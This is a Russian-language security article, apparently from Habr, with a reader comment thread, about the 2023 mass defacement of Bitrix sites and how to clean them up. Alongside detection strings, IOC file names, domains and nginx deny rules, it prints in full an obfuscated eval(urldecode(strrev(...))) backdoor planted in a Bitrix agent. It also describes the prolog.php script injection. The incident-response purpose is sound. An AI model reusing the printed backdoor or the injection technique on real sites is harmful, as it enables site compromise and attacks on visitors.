05.06.2023 13:00
programmerguru 92 42000 Источник

26 мая 2023 года произошёл массовый дефейс веб-серверов национального сегмента сети интернет .РФ. В качестве цели атаки выступила CMS «Битрикс».

В ходе расследования выяснилось, что атака подготовлена заранее. Подготовка велась с 2022 года через известные уязвимости, включая CVE-2022-27228. Техническое описание см. на форуме разработчиков. Возможно, это самая крупная атака против национального сегмента .РФ в его истории.

Компания CyberOK выпустила отчёт c описанием атаки и разъяснением необходимых действий для того, чтобы удалить с сервера бэкдор, устранить уязвимости «Битрикса» и восстановить приложение. Также приведены рекомендации по защите веб-приложения.

Ещё в июле 2022 года Национальный координационный центр по компьютерным инцидентам (НКЦКИ) предупредил об угрозе заражения сайтов под управлением «Битрикс» через 0day-уязвимость CVE-2022-27228, известную с 3 марта 2022 года.

11 марта 2022 года разработчик оперативно исправил уязвимость и обновил модуль vote до версии 21.0.100, а саму CMS до версии 22.0.400.

К сожалению, некоторые системные администраторы не получили эту информацию или проигнорировали её.

▍ Эксплуатация уязвимости


Уязвимость в модуле vote «Битрикс» позволяет удалённому злоумышленнику записать произвольные файлы на сервер посредством отправки специально сформированных сетевых пакетов.

Согласно описанию НКЦКИ за март 2022 года, в дальнейшем злоумышленник использовал эти файлы для заражения клиентских браузеров, то есть посетителей сайта.

  1. После эксплуатации уязвимости злоумышленник загружает на веб-сайт модифицированный файл (/bitrix/modules/main/include/prolog.php), в который добавляется строка (https://techmestore[.]pw/jqueryui.js), вызывающая сторонний JS-скрипт jquery-ui.js.

  2. При посещении заражённого веб-сайта под управлением «Битрикс» в кэш браузера пользователя внедряется JS-скрипт, который загружается из различных директорий веб-сайта, к примеру:
    • bitrix/js/main/core/core.js?1656612291497726
    • bitrix/js/main/core/core.js?1656598434497824
    • bitrix/templates/cm_main/js/jquery-1.10.2.min.js

Злоумышленник мог использовать как один вектор заражения, так и оба сразу.

Сейчас такой эксплуатации уязвимости мы не наблюдали. В отличие от предыдущих атак, в мае 2023 года уязвимость использовалась не для перенаправления пользователей на сторонние сайты, а для дефейса и установки бэкдора (см. ниже).

В 2023 году, кроме модуля vote, злоумышленники использовали ещё и служебный модуль fileman, реализующий возможность визуального HTML-редактора. В составе этого модуля присутствует уязвимый скрипт html_editor_action.php. Эксплуатация уязвимости этого файла аналогично CVE-2022-27228 позволяет неавторизованному злоумышленнику удалённо выполнять произвольный код на целевой системе.

В результате успешной эксплуатации этой уязвимости в логе появится
строка с успешным POST-запросом к файлу /bitrix/tools/html_editor_action.php вроде такой:

***POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 ***

▍ Описание атаки 2023 года


Основные действия после взлома:

  • заменяется index.php в корневой директории веб-приложения;
  • встраивание вредоносного кода в PHP-скрипты модулей;
  • удаляется файл /bitrix/.settings.php;
  • создаются скрипты Агентов с вредоносным кодом или модифицируются
    существующие скрипты;
  • удаляют данные из таблиц базы данных b_iblock, b_iblock_element, b_iblock_element_property;
  • создание файлов .htaccess во всех каталогах веб-приложения;
  • создание PHP-скриптов в директории /bitrix/admin/ с произвольными именами файлов.

▍ Необходимые действия после заражения


Согласно рекомендациям НКЦКИ, после заражения необходимо совершить следующие действия:
  • Провести обновление «Битрикс» до актуальной версии, как минимум 22.0.400.
  • Проверить веб-сайт на наличие вредоносного JS-кода. Например, можно установить из каталога готовых решений «1С-Битрикс: Поиск троянов» и запустить сканирование. Для этого необходимо открыть панель управления сайта и перейти на следующую вкладку:

    • Настройкиbitrix.xscanПоиск и Поиск (бета)

    Модуль отсканирует весь сайт и отобразит выявленные подозрительные файлы.



    По факту нынешней атаки выявлены следующие индикаторы компрометации:

    Имя файла Директория Пример команды для поиска
    xmlrpcs.php Используются различные
    каталоги    		 find ./ -name xmlrpcs.php
    inputs.php Используются различные
    каталоги    		 find ./ -name inputs.php
    рекомендуется исключить из поиска легитимный файл:
    /bitrix/modules/sale/lib/delivery/inputs.php
    l.php /bitrix/src/app/ find ./ -name l.php
    /bitrix/tools/spread.php /bitrix/tools/
    /bitrix/
    access.php

    wp.php

    term.php

    locale.php

    themes.php

    network.php

    container.php

    router.php

    wp-login.php    		 /bitrix/modules/iblock/lib/biz
    proctype/    		 любой из файлов в указанной директории
    /bitrix/tools/send_trait_imap.p
    hp
    /bitrix/tools/.cas.php
    /bitrix/tools/.cas.tmp.php
    Рекомендуется обратить внимание на файлы со случайно сгенерированным именем из набора символов [a-z, 0-9] в каталоге /bitrix/admin/ и в корневой директории сайта.

    Были выявлены файлы вида:

    • /bitrix/admin/f408f2b7df70.php
    • /bitrix/admin/8f1c222aae51.php
    • /2469a41bac71.php
    • /98826/bfd99.php


    При обнаружении вредоносного кода следует провести мероприятия по его удалению, а также проверить систему на компрометацию.
  • Проверить наличие фактов нелегитимной модификации файлов, посредством команды, которая осуществляет поиск и сортирует изменённые и новые файлы за последние 30 дней, кроме последнего дня:

    find /home/Путь к вашей папке Bitrix/public_html -type f -mtime -30 ! -mtime -1 -printf '%TY-%Tm-%Td %TT %p\n' | sort -r

Например, если проверить файл bitrix/modules/fileman/admin/fileman_html_editor_action.php, то мы увидим следующее:


«Плохой» код


«Хороший» код

Кроме создания новых файлов, злоумышленники могут встраивать вредоносный код в существующие файлы. Его можно найти по следующим фрагментам строки:

  • str_rot13
  • md5($_COOKIE
  • bitrixxx
  • eval(base64_decode
  • BX_STAT
  • BX_TOKEN
  • parse_str(hex2bin
  • iasfgjlzcb
  • QlhfVE9LRU4=
  • gzinflate(base64_decode
  • C.A.S
  • urldecode(base64_decode(hex2bin

Из результатов поиска по str_rot13 необходимо исключить следующие файлы:

  • /bitrix/modules/main/classes/general/vuln_scanner.php
  • /bitrix/modules/main/lib/search/content.php
  • bitrix/modules/socialnetwork/lib/item/logindex.php

На странице со списком Агентов «1С-Битрикс» (/bitrix/admin/agent_list.php) можно проверить вызываемые функции на наличие вредоносного кода. Для этого открываем панель управления сайта и переходим на вкладку НастройкиНастройки продуктаАгенты.

Название агента может быть любым, но обычно он виден визуально, как на КДПВ:



После восстановления сайта или БД из резервной копии рекомендации следующие:

  • ограничить административные доступы к CMS, а также, в случае наличия, FTP, MySQL.
  • проверить функции, вызываемые функциями-агентами (/bitrix/admin/agent_list.php), на наличие вредоносного кода. Пример модификации агента:

    $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));

Рекомендации по защите веб-сайтов:

  • перевести работу сайта на актуальную версию PHP 8.
  • обновлять CMS Bitrix до актуальных версий.
  • включить проактивную защиту CMS Bitrix: проактивный фильтр (https://dev.1cbitrix.ru/user_help/settings/security/security_filter.php) и контроль активности (https://dev.1cbitrix.ru/user_help/settings/security/security_stat_activity.php).
  • проверить сайт инструментом CMS Bitrix «Сканер безопасности»
    (/bitrix/admin/security_scanner.php).
  • закрыть доступ к файлам на уровне сервера (например, в .htaccess)
    • /bitrix/tools/upload.php
    • /bitrix/tools/mail_entry.php
    • /bitrix/modules/main/include/virtual_file_system.php
    • /bitrix/components/bitrix/sender.mail.editor/ajax.php
    • /bitrix/tools/vote/uf.php
    • /bitrix/tools/html_editor_action.php
    • /bitrix/admin/site_checker.php

  • Добавить в конфигурацию веб-сервера запрещающие правила. Пример правил для Nginx:

    location /bitrix/tools/vote/uf.php {
	if ($request_method = POST ) {
		deny all;
	}
}
location /bitrix/tools/html_editor_action.php {
	if ($request_method = POST ) {
		deny all;
	}
}

▍ IOC


otrasoper[.]ga/help/?23211651614614
techmestore[.]pw
unasinob[.]cf
core.js?1656612291497726 — d74272539fc1c34fa5db80a168269d319d8c541bb36cbf0e99233cbe7ab9474d
core.js?1656598434497824 — da9c874d43fc94af70bc9895b8154a11aab1118a4b5aefde4c6cee59f617707e
jquery-1.10.2.min.js — 0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988

Примечание. В некоторых случаях сайт может быть заблокирован НКЦКИ по причине размещения противоправного контента на взломанном сайте, а также из-за его использования злоумышленниками для проведения компьютерных атак на критическую инфраструктуру в соответствии со статьёй 5 Федерального закона № 187-ФЗ «О безопасности критической информационной инфраструктуры РФ», пунктом 5.1 Приказа ФСБ России от 24.07.2018 г. № 366 и пунктом 9 Правил централизованного управления сетью связи общего пользования, утверждённых постановлением Правительства Российской Федерации от 12 февраля 2020 года
№ 127.


После дефейса на сайте появляется текст, который может привести к блокировке со стороны НКЦКИ по причине размещения противоправного контента

Блокировка применяется до момента фиксации НКЦКИ факта удаления противоправного контента.

В этом случае после удаления бэкдора и устранения уязвимостей необходимо связаться с командой Национального координационного центра по компьютерным инцидентам.

Комментарии (92)


  1. freeExec
    05.06.2023 13:22
    #25618654
    +54

    С чего это тут какой-то битрикс олицетворяется со всия интернет рф?


    1. Keeper9
      05.06.2023 13:22
      #25618812
      +63

      Внедрение битрикса пора приравнивать к вредительству.


      1. Areso
        05.06.2023 13:22
        #25618846
        +13

        Ой, несмотря на то, что Битрикс, это кусок плохого кода, такие проблемы бывают с WordPress'ом, особенно с его плагинами.


        1. plFlok
          05.06.2023 13:22
          #25619044
          +18

          а вордпресс как будто не кусок плохого кода?

          там ведь до сих пор апи взаимодействия с плагинами держится на том, что им разрешается редактировать глобальные переменные, содержащие итоговую вёрстку?


          1. Areso
            05.06.2023 13:22
            #25619056
            +1

            Вы правы, кусок плохого и неоптимизированного кода =)

            В то время как WP -- кусок плохого кода.


          1. SargeT
            05.06.2023 13:22
            #25627990

            А какая из популярных cms с крупным сообществом не кусок плохого кода?


      1. My-name
        05.06.2023 13:22
        #25623960

        Так по сути - именно это и наблюдаем.

        Просто уже и здесь появляются публикации по этой тематике.

        Считаю это следствием излишнего перегиба, допущенного за счёт излишней монополизации

        (это - характерное свойство закрытых систем).


    1. Moskus
      05.06.2023 13:22
      #25619288
      +3

      битрикс олицетворяется отождествляется


    1. ASGAlex
      05.06.2023 13:22
      #25621174
      +3

      Погуглить разные рейтинги - по ним битрикс стабильно входит в TOP-5 по частоте использования. Даже если это будет только 10% против 40% у вордпресса - всё равно кусок довольно лакомый, чтобы и им поживиться. А тесная связь с рунетом - скорее не потому, что с точки зрения авторов он что-то там олицетворяет, а потому, что за пределами рунета его либо мало, либо нет. Вордпресс по собиранию эксплойтов там отдувается за двоих, бедняга ????


  1. vilgeforce
    05.06.2023 13:22
    #25618668
    +7

    "Подготовка велась с 2022 года" - почему вы так решили?


    1. numb
      05.06.2023 13:22
      #25618764
      +40

      Чтобы круче звучало.


      1. ALexhha
        05.06.2023 13:22
        #25621326
        +4

        Чтобы круче звучало.

        Тогда надо было писать - "Подготовка велась с февраля 2022 года"


        1. DarkHost
          05.06.2023 13:22
          #25621458
          -1

          Тонко)


    1. Scratch
      05.06.2023 13:22
      #25618842
      +40

      А всё же верно, только надо уточнить, что подготовка велась не "там", а "тут". И фактически началась с релиза этого самого битрикса, который в основном обслуживается бегунками на пол ставки, вместо нормальной сервисной программы автоматического обновления. Это практически готовый троянский конь федерального масштаба, замаскированный под монопольную CMS


      1. vilgeforce
        05.06.2023 13:22
        #25618866
        +1

        Если с этой стороны посмотреть - то да...


      1. balamutang
        05.06.2023 13:22
        #25620874
        +1

        В битриксе как раз обновление автоматическое, все что нужно сделать бэкап да кнопку обновления ткнуть. Если этого админ не делает периодически то это его проблемы


        1. hullaballoo
          05.06.2023 13:22
          #25621910

          И лицензию не забывать продлевать, пушо без активной лицензии автообновление работать не будет.


          1. balamutang
            05.06.2023 13:22
            #25624766
            +1

            Ну обновления почаще выходят, раз в квартал как минимум надо обновляться, а лицензия раз в год обновляется.

            Суть возражения тут я не особо улавливаю, то что битрикс платный? Так не покупайте битрикс, используйте вордпресс/джумлу и тд.

            Все по деньгам и по техническим требованиям, некоторым вообще страничек в вк и инсте и магазина на озоне/вб хватает, даже обновления ставить не надо как в том же вордпрессе/битриксе, вся возня айтишная на аутсорсе получается, только товар подвози.


        1. playnet
          05.06.2023 13:22
          #25622748
          +2

          "автоматическое"
          "ткнуть"
          почти как "сухая вода"


          1. balamutang
            05.06.2023 13:22
            #25624688

            Ну знаете, это не загружать по фтп и не в консоли файлы распаковывать. Вы попробуйте например инстанс рокетчата обновить, для сравнения.

            А полностью автоматические обновления в отвественных местах никто (психически здоровый) не ставит, такие вещи все равно на контроле должны быть.


            1. playnet
              05.06.2023 13:22
              #25626160

              привет винде? ))
              Там нужна масса усилий отключать именно автоматические обновления.
              И да, есть всус или как его.. тем не менее, оно именно что автоматическое.


    1. programmerguru Автор
      05.06.2023 13:22
      #25618970
      -1

      Привет! Одного из хакеров удалось отловить. Он даёт показания.


      1. vilgeforce
        05.06.2023 13:22
        #25619000
        +13

        Да вы что?! Вот прямо за неделю смогли отловить злого хацкера, который планировал операцию аж целых 6 месяцев? Возбудили уголовное дело, провели ОРМ, аресты, обыски и вот это все? Что-то в стране поменялось, что их начали так быстро ловить, не иначе...


        1. lopatoid
          05.06.2023 13:22
          #25619034
          +18

          Поменялось, конечно. Раньше хотя бы делали вид, что соблюдают законы, а сейчас можно уже этим на заморачиваться: юристы из страны разъехались; независимые СМИ, которые могли бы написать о несправедливости -- тоже эвакуировались из страны или заблокированы Роскомнадзором. И если раньше тот же Богатов всё-таки вышел из заключения, то сейчас властям нет смысла отпускать бедных владельцев затрояненных компьютеров, через которые хакеры могут орудовать.


          1. vilgeforce
            05.06.2023 13:22
            #25619050

            Обидно, что ловят не тех: ты следакам на блюдечке с голубой каемочкой все приносишь, а ловят каких-то левых людей :-/


            1. avitek
              05.06.2023 13:22
              #25621142
              +1

              Разные целеполагания.


    1. Darkholme
      05.06.2023 13:22
      #25620002
      +6

      Потому что в сознании обывателя сразу же рисуется образ опасного ЛГБТ секс-инструктора из НАТО, который одной рукой ломает сайты а другой, кхм, инструктирует (или разрабатывает?).


      1. dartraiden
        05.06.2023 13:22
        #25621684
        +2

        Разрабатывает бэкдор.


  1. BoberMod
    05.06.2023 13:22
    #25618854
    +7

    А почему скриншот замазан? Там же кроме текста ничего нет. Неужели в сверхдержаве за обычный текст на скриншоте сайта могут заблокировать сайт?


    1. programmerguru Автор
      05.06.2023 13:22
      #25618992
      +7

      Откуда вы знаете, что там есть? :)


      1. BoberMod
        05.06.2023 13:22
        #25619006
        +12

        Я не знаю, что конкретно "там есть", но по контурам видно только логотип и текст. Что такого в 2 абзацах текста на скриншоте, что его так тщательно замазали?


        1. playnet
          05.06.2023 13:22
          #25622758

          "логотип" скорее всего содержит цвета соседнего государства. А в данное время это хуже свастики....


      1. Wesha
        05.06.2023 13:22
        #25622816

        Откуда вы знаете, что там есть? :)

        Предположу, что спойлер развернул?


    1. TheRaven
      05.06.2023 13:22
      #25618996
      +32

      Если погуглить источник заглавной картинки, то можно найти статью с немного более раскрытой тех. инфой и незамазанным скриншотом. Так, вот, на скриншоте есть страшное слово "Конституция".


      1. vilgeforce
        05.06.2023 13:22
        #25619016

        Наверное, "подготовка с 2022 года" это про публикацию инструкции по эксплуатации уязвимостей...


      1. Wesha
        05.06.2023 13:22
        #25619150
        +6

        А другие страшные слова с той картинки почему не упомянули?
        Например, слово на У?
        Например, слово на У?


        1. BoberMod
          05.06.2023 13:22
          #25619202
          +3

          Например, слово на У?

          Все настолько плохо, что "Украина" уже нельзя называть, а только по первой букве указывать?

          И что в этом тексте такого, что его нельзя показывать?


          1. Wesha
            05.06.2023 13:22
            #25619374
            +14

            Все настолько плохо

            Всё ещё хуже.
            А если б назвал — было бы -10. Плавали, знаем.
            А если б назвал — было бы -10. Плавали, знаем.


            1. BoberMod
              05.06.2023 13:22
              #25619380
              +11

              Ну если пропаганда здравого смысла это плохо, а "Украина" это страшное слово, которое нельзя называть, то "всё идет по плану", спасибо


              1. Wesha
                05.06.2023 13:22
                #25619424
                +1

                Это Хабр, привыкайте. И да пребудет с Вами карма!


                1. QDeathNick
                  05.06.2023 13:22
                  #25619612

                  Совсем офтоп, но почему я не могу голосовать за часть комментариев? Например за ваш и выше, а за другие могу.

                  PS. А, видимо это был глюк, обновил страницу, теперь ни за какие не могу :)


                  1. Wesha
                    05.06.2023 13:22
                    #25619624
                    +2

                    1. Обновить страницу пробовали? Иногда помогает.

                    2. Голсование за комментарии блокируется, если исчерпался заряд голосования (а у нас с Вами он не очень большой)

                    3. Голосование блокируется, если с момента создания статьи прошло сколько-то там дней (не наш случай, но просто для полноты картины).


                  1. mvv-rus
                    05.06.2023 13:22
                    #25619706
                    +1

                    Число возможных голосов за комментарии ограничено Кармой: например, у вас их должно быть 20 в сутки.


            1. mvv-rus
              05.06.2023 13:22
              #25619702
              +6

              А другие страшные слова с той картинки почему не упомянули?

              Дык, "Конституция " там и есть самое важное слово. Вас не удивил явный анахронизм на картинке? Меня - удивил: День Конституции Украины празднуется 28 июня. В понятных вам терминах: такой текст для сегодняшнего дейеса так же удивителен, как и текст сегодняшнего же воображаемого дефейса американского сайта с упоминанием Declaration of Independence (праздник ее принятия празднуется, как всем известно, 4 июля.).

              Кароче, меня это таки удивило и я полез чисто для себя поинтересоваться вопросом. Первые же поиски в интернетах показали, что взлом ряда российских сайтов в День Конституции Украины через этот вектор действительно имел место:

              В День конституции Украины, 28 июня, на главных страницах целого ряда российских сайтов в результате деятельности киберпреступников появились антивоенные призывы и поздравления с праздником.

              Для поиска содержимого тогдашнего дефейса я обратился к русскоязычным ресурсам в нейтральных странах, и таки кое-что нашел, а именно - кусок текста прямо с вашей картинки

              В связи с этим у меня сложилась рабочая гипотеза: некто получил в свои руки одновременно и список поддоменов домена рф., и тот самый скрипт, которым делался дефейс в прошлогодний День Конституции Украины. Как это произошло - я без понятия. После чего этот некто и запустил скрипт по списку, нимало не задумываясь над его смысловым содержанием. Из этого, кстати, следует и моя оценка квалификации автора атаки: script-kiddie

              PS Ну, а ещё я бы мог сказать ряд добрых слов про разгильдяство админов, но, из профессиональной солидарности - не буду: они теперь сами все осознали (надеюсь ;-) ).

              PPS Если вас таки интересует, что же послужило спусковым крючком реакции РКН, то, по моим оценкам, это - последняя фраза (т.е. часть предложения) в предпоследнем абзаце. Но это не точно - к тайным знаниям РКН я не допущен (и даже не хочу быть допущенным: не люблю формы допуска еще с тех давних советских времен, когда мне приходилось их подписывать - благо это было давно: советские времена и сроки действия допуска давно кончились). А так как текст с этой фразой появился почти год назад, то он, по моим предположениям, он лежал себе лежал где-то в базах данных РКН, а вот теперь дождался своего часа и вызвал чисто автоматически блокировку пострадавших сайтов.


              1. zabanen2
                05.06.2023 13:22
                #25621134
                +1

                лингвист по указке товарища майора заключает что означает тот или иной текст. если линвист с выдумкой и решает по своему усмотрению - этот лингвист остается без работы и ищется более сговорчивый лингвист. https://www.kommersant.ru/doc/5089586


          1. PrisonerOfDarkMatter
            05.06.2023 13:22
            #25621132
            -1


    1. cyberserk
      05.06.2023 13:22
      #25621130
      +4

      Прости, пожалуйста, Володымыр, а в маленькой но гордой сверхдержаве приветствуется поздравления с Днем Конституции России на ее ресурсах?


  1. javalin
    05.06.2023 13:22
    #25619062
    +13

     через 0day-уязвимость CVE-2022-27228, известную с 3 марта 2022 года.

    Почему-то всегда думал, что уязвимости нулевого дня, это те, о которых неизвестно широкой публике.


    1. si1v3r
      05.06.2023 13:22
      #25619236
      +1

      Ну до 03.03.22 то была.


    1. morijndael
      05.06.2023 13:22
      #25619510
      +7

      Не публике, а разработчикам. Т.е 0day == у разработчиков было 0 дней (и шансов) на исправление. Конечно, если известно широкой публике, то разработчикам обычно тем более, но... у 1С-Битрикс похоже свой путь /j


      1. tommyangelo27
        05.06.2023 13:22
        #25620032
        -4

        Вангую, что "нуль-день" вместо 0-day


  1. ifap
    05.06.2023 13:22
    #25619098
    +18

    Ещё в июле 2022 года Национальный координационный центр по компьютерным инцидентам (НКЦКИ) предупредил об угрозе заражения сайтов под управлением «Битрикс» через 0day-уязвимость CVE-2022-27228

    Пфф... еще в марте 2022 года взломали "Госмонитор" и через него дефейснули десятки если не сотни госсатойв и-и-и... спустя год 8% сайтов федеральных госорганов продолжают загружать с взломанного сайта исполняемый код. При том что сайт заброшен, сертификат давно протух. А тут какая-то уязвимость в какой-то битриксе...


  1. Zivaka
    05.06.2023 13:22
    #25619118
    +8

    Еще много лет назад после подобной ситуации почти насильно заставил разработчиков добавить в гит весь проект на Битриксе целиком, а не только шаблоны и модули. Выслушал немало доводов, что это не правильно и так никто не делает. Вот только в похожих ситуациях стало намного проще разобраться, что и где случилось, а также оперативно откатить эти изменения. Да, при обновлении есть ряд сложностей, но на больших проектах это случается 1-2 раза в год и вполне можно смириться. А в целом же что-то подобное у Битрикса раз в год, но точно случается, к сожалению.


    1. Areso
      05.06.2023 13:22
      #25619186
      +2

      решето.джипег


      1. Zivaka
        05.06.2023 13:22
        #25619210
        +1

        Это следствие его популярности и тот факт, что запустить на нем проект достаточно легко сейчас.


        1. NikitchenkoSergey
          05.06.2023 13:22
          #25619238
          +8

          К сожалению, это следствие не популярности, а полного игнорирования разработчиками техдлога и всех возможных стандартов сообщества. Кодовая база и архитектура битрикса (кишки наружу, код на массивах с кучей ошибок, без тестов, без анализатора) находится на уровне 2010 года, со всеми вытекающими.

          Кто-то может сказать, что они так заботились о юзерах, типа обратная совместимость и обновления, которые можно накатить с любой версии. Ну во-первых, это не так, все равно куча проблем и нужно вручную фиксить много всего, юзерспейс переделывался. Во-вторых - это медвежья услуга, теперь имеем, что имеем.

          Еще они известные велосипедисты, со всеми вытекающими. Тут у них в комментах спрашивал про композер - сказали "небезопасно использовать эти ваши доктрины". Пилят какие-то свои неюзабельные поделки на массивах.

          Битрикс в таком виде нужно было давно закопать. Если они сейчас в недрах не пилят какой-нибудь "Битрикс 2" как цмс поверх симфони, то скоро их время пройдет.


          1. Zivaka
            05.06.2023 13:22
            #25619260
            +3

            Все верно, но популярность тут тоже имеет немалую роль, так как и внимания больше в целом и "эффект" от ситуаций куда заметнее в частности.


          1. vanxant
            05.06.2023 13:22
            #25619414
            -3

            Судя по вашему комменту, вы битрикс видели последний раз где-то в 2010-ом, ну максимум 2015-ом.


            1. NikitchenkoSergey
              05.06.2023 13:22
              #25619472
              +8

              Теперь уже к моему сожалению, это не так.

              А что поменялось с 2010? Появилась единая точка входа, все кишки спрятали выше document root? Стали придерживаться PSR? Внедрили композер, автотесты, линтер? Перестали велосипедить? Нет :)


              1. vanxant
                05.06.2023 13:22
                #25619800
                -1

                Единая точка входа была кажется и в 2010, urlrewrite называется:)

                Кишки выше docroot ну не в 2010, но в 2015 уже были. Называется "сайт в папке". Требует написания пары строчек в конфиге nginx-а, а поскольку большинство хостингов этого не позволяют, ну выпонели.

                С PSR ситуация улучшается. Композер юзать никто не мешает в обе стороны (как брать чужие пакеты, так и подключать к ним битрикс). АПИ на массивах давно заброшено и не развивается, но поддерживается для обратной совместимости (хотя под капотом там часто уже обёртки над ORM-ом).

                А вот насчёт велосипедов ситуация ровно обратная. Для отечественной бизнес-инфраструктуры (банки, маркетплейсы, соцсети, смс-шлюзы, онлайн-кассы, доставщики и т.д.) модуль для битрикса это пункт намбер ван. Намбер ту - плагин для вордпресса. А вот "крудошлёпы на фреймворках" таскают собственные глюкавые велосипеды из проекта в проект.


        1. Areso
          05.06.2023 13:22
          #25619250
          +3

          Можно перечислять много современных веб-фреймворков, но кроме CMS Bitrix и CMS Wordpress (кстати, обратите внимание, что хаят именно CMS-ки, а не фрейморки, на которых тоже легко собрать что-то рабочее с минимальными усилиями), решето ни с кем из них не ассоциируется.


          1. Zivaka
            05.06.2023 13:22
            #25619266

            Да, но только на Битриксе вы можете запустить условный проект за один вечер и это будет очень даже неплохой внешне интернет-магазин, а любом фреймворке это вряд ли получится. И не факт, что для большинства проектов выбор фреймворка даже в перспективе может окупиться, так как до этого момента доживает крайне мало проектов)


            1. Areso
              05.06.2023 13:22
              #25619352
              +2

              Opencart


              1. Zivaka
                05.06.2023 13:22
                #25619394
                +3

                И да, и нет одновременно. Если уходить в детали именно для e-commerce, которые крайне важны на самом деле, то в Битриксе есть много чего сходу или в их маркетплейсе, что в других движках придется с нуля реализовывать. На начальном этапе Битрикс для многих - более простой и понятный выбор.


            1. Darkhon
              05.06.2023 13:22
              #25619628
              +1

              Ну, Wordpress+Woocommerce тоже можно за вечер.


            1. xSVPx
              05.06.2023 13:22
              #25625592

              Ээээ. интернет магазин за вечер ;)?

              Куда вы торопитесь ?

              Зачем ? Ради чего ? Одни фотки и тексты займут недели...

              Я видел таких "ИМ" три. Не знаю за вечер ли, но судя по словам владельцев за них были заплачены сотни тысяч рублей. Все на Битриксе.

              Первая страница занимала от 40 до 100мб :))). Да. Мегабайт. Да. Сто.

              Достаточно всего лишь использовать вместо превьюшек файлы в 4к и установить им визуальные размеры. Чего париться то ? А давайте ещё несжатым видео запланируем.

              Я не знаю кто был те герои, которые это все понахреначили. Но, вероятно, действительно "за вечер"...

              Второй пример: корпоративный портал за полмиллиона. Из 3 (трёх) страниц. Люди сделавшие его и сдавшие заказчику даже не озаботились созданием резервных копий хоть каких-то путем жмакания кнопочки в админке. Зато настроили автообновления, которые сломали его через пару месяцев. Ну или сами зашли и сломали, теперь уж не разобраться...

              Итд итп.

              Если вам неважен результат - сделать за вечер отличный план.


              1. Zivaka
                05.06.2023 13:22
                #25625602

                Про вечер я условно, речь просто про достаточно быстрый запуск и без привлечения команды разработчиков, скорее просто технически подкованных специалистов.

                Фотки и тексты могут и годы занимать, потому что это не прекращающийся процесс, у нас по крайне мере именно так.

                Странных проектов много, я могу множество примеров привести, однако не все запускают Озон, МВидео и т.п., поэтому мотивация сильно отличается. Как и техническая подкованность.


          1. vanxant
            05.06.2023 13:22
            #25619428

            ... хотя решето там как правило намного серьёзнее. Просто правило неуловимого джо.


            1. Areso
              05.06.2023 13:22
              #25619462

              миллионы сайтов на Flask, FastAPI, и так далее никому не нужны?


  1. vit1252
    05.06.2023 13:22
    #25619474
    -1

    Цена жизни в "коммунальной квартире" и использовании общественного продукта. С другой стороны, а кто у нас кроме Yandex.Market и ОЗОН свой магазин сделали? Очень дорого для малого бизнеса делать что-то свое.


    1. Areso
      05.06.2023 13:22
      #25619478
      +2

      магазин

      у вас в слове маркетплейс много ошибок.

      И даже в таком случае есть Вайлдберис, есть Ярмарка Мастеров, есть Авито, Ламода, СберМегаМаркет...


      1. Areso
        05.06.2023 13:22
        #25619822
        +3

        Не совсем понимаю логику минусующих мой комментарий.

        В РФ по пальцам двух рук пересчитать маркетплейсов, но их и по определению не может быть слишком много; в то время как интернет магазинов -- в том числе самописных -- в России очень много. Потому что нет ничего сложного в том, чтобы налабать сайтик и подключить модуль оплаты.


    1. karavan_750
      05.06.2023 13:22
      #25619716
      +2

      Обязательное условие безопасности -- свой продукт? По моему, нет.

      Грамотная поддержка любого продукта -- да, одно из условий, но обязательно на всех этапах разработки и эксплуатации. Это условие считаю доступным каждому заказчику.


  1. ValdikSS
    05.06.2023 13:22
    #25619892
    +25

    В некоторых случаях сайт может быть заблокирован НКЦКИ по причине размещения противоправного контента на взломанном сайте

    Большое спасибо нашему доблестному церту и ДЦОА: внереестровые блокировки сайта на ТСПУ, без уведомления владельца сайта/домена и хостера — это то, что мы давно ждали и к чему стремились! Ведь главное — как бы норот не увидел ужасающие сообщения, а администратор сайта не мог на него зайти, чтобы вернуть всё назад, сидел и недоумевал вместе с хостером о причинах недоступности сайта из РФ!

    а также из-за его использования злоумышленниками для проведения компьютерных атак на критическую инфраструктуру

    Ага-ага, блокируют пользовательские сети, потому что на сетях хостинг-площадок ТСПУ едва ли встречается :)

    Блокировка применяется до момента фиксации НКЦКИ факта удаления противоправного контента.

    Как минимум в одном известном мне случае блокировка началась уже после восстановления работы сайта.

    С ДЦОА простой смертный связаться не может: номеров телефонов и емейлов нет в открытом доступе, а если и частное лицо им позвонит, от общаются они примерно так:


    1. vanxant
      05.06.2023 13:22
      #25620136
      +2

      на сетях хостинг-площадок ТСПУ едва ли встречается

      Проверяется элементарно жи ну. Попробуйте развернуть VPN на интересующей хостинг-площадке.


      1. ValdikSS
        05.06.2023 13:22
        #25621148

        У меня не особо много серверов в РФ, но на тех, что есть, ТСПУ не встречается. Это не значит, что на них вообще нет блокировок.

        Проверить довольно просто: curl -L https://play.google.com/
        Если открывается — ТСПУ нет.


        1. blind_oracle
          05.06.2023 13:22
          #25621406

          А что, гуглплей уже заблокирован разве?


          1. ValdikSS
            05.06.2023 13:22
            #25621474
            +1

